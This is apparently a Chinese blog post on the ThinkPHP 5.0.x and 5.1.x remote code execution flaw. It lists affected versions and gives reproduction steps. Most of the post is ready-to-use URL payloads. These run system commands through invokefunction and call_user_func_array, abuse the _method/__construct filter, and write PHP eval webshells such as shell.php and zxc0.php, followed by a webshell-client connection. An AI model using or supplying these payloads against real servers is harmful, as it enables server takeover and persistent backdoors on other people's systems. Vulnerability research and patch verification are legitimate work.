本文详细介绍了ThinkPHP 5.0.x版本中的安全漏洞,包括受影响的版本范围、漏洞复现步骤以及不同版本的POC。针对5.0.8至5.0.19及5.0.20至5.0.23的多个版本,分别给出了利用示例,并提供了可能导致代码执行和文件写入的攻击路径。此外,还提及了5.1.x版本在不同PHP版本上的漏洞利用方式。了解这些漏洞有助于加强应用程序的安全防护。
影响范围
ThinkPHP 5.0.全版本
5.0.13~5.0.19的,这些版本默认情况下config中的app_debug配置项为false,需开启才能存在此漏洞。
漏洞复现
访问靶机
传入
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=pwd
写入一个shell.php
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20@eval($_POST[123])?%3E
蚁剑连接成功
大佬的poc
# 版本号5.0.8~5.0.19
?s=whoami&_method=__construct&filter&filter=system# 版本号5.0.20~5.0.23
_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami5.1.x php版本>5.5:
?s=index/think\request/input?data[]=phpinfo()&filter=assert?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>5.0.x php版本>=5.4:
?s=index/\\think\\template\driver\\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>'
?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>'
?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo \'<?php @eval($_POST[xxxxxx]);?>\'>zxc2.php'
219
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
